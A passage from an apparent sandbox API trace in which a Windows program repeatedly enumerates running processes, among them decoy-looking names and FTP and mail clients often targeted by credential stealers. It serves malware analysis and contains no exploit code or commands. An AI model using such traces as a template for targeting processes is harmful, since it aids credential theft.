lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0147.969] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0147.970] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0147.972] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0148.054] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1398, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0148.056] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0148.058] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0148.072] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0148.075] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0148.078] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x7c8, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0148.080] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x7c8, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0148.082] CloseHandle (hObject=0x1cd4) returned 1 [0148.082] Sleep (dwMilliseconds=0x64) [0148.214] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xcbc [0148.226] Process32First (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0148.228] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0148.229] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0148.231] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0148.233] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0148.234] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0148.236] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0148.237] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0148.240] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0148.241] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.243] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.244] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0148.246] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.247] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.332] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.334] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.336] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.338] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.340] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.343] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0148.345] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0148.347] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0148.349] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0148.351] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.354] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0148.357] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0148.359] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0148.361] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0148.363] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0148.366] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0148.368] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.415] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0148.418] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0148.419] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0148.421] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0148.423] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.424] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0148.425] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0148.427] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0148.429] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0148.430] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0148.432] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0148.433] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0148.435] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0148.436] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0148.438] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0148.440] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0148.441] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0148.442] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0148.445] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0148.447] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0148.449] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0148.460] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0148.463] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0148.465] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0148.468] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0148.471] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0148.473] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0148.476] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0148.479] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0148.482] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0148.485] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0148.487] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0148.490] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0148.493] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0148.496] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0148.506] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0148.508] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0148.511] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0148.513] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0148.517] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0148.520] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0148.522] Process32Next (in: hSnapshot=0xcbc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0148.524] Process32Next 